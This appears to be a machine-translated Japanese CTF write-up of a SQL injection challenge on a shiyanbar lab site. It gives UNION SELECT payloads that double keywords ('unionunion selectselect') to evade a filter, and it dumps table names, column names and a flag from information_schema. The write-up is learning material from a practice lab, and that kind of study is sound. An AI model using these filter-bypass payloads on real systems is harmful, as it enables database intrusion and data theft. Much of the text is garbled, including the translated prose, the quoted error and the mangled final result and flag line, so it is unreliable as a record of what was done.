実験しましょう.CTF-WEB

実験しましょう.CTFライブラリ-WEB
問題をするのは順序に従っていません.踊りながらやっています.文章を書く目的は問題を解く構想を記録するためです.もちろん、ついでに人を助けることができればいいです.
1.簡単なsql注入
フラッシュ値を注入して獲得しました.http://ctf5.shiyanbar.com/423/web/」
入力1’が提出された後、ページエラーが発生しました.You have an error in your SQL syntax;check the manaual that cores ponds to your MySQL server sion for the right sysntax to use near'1't'at line 1
したがって、ページは文字列注入であるべきです.order byで3列を検出し、共同で検索します.彼はキーワードとフィールドをフィルタリングしたので、2つのキーワードを繰り返してフィルタリング機構に対処します.

1' unionunion  selectselect  table_name  fromfrom  information_schema.tables wherewhere '1'='1

提出後に爆発したメッセージがあります.

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag


1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

ID:1'union select flagm frame from frame frame'1'='1 name:baloteli ID:1'union select flagm frame frame'1'='1 name:flags{Y 0 uu@r 3 o 5 Oud}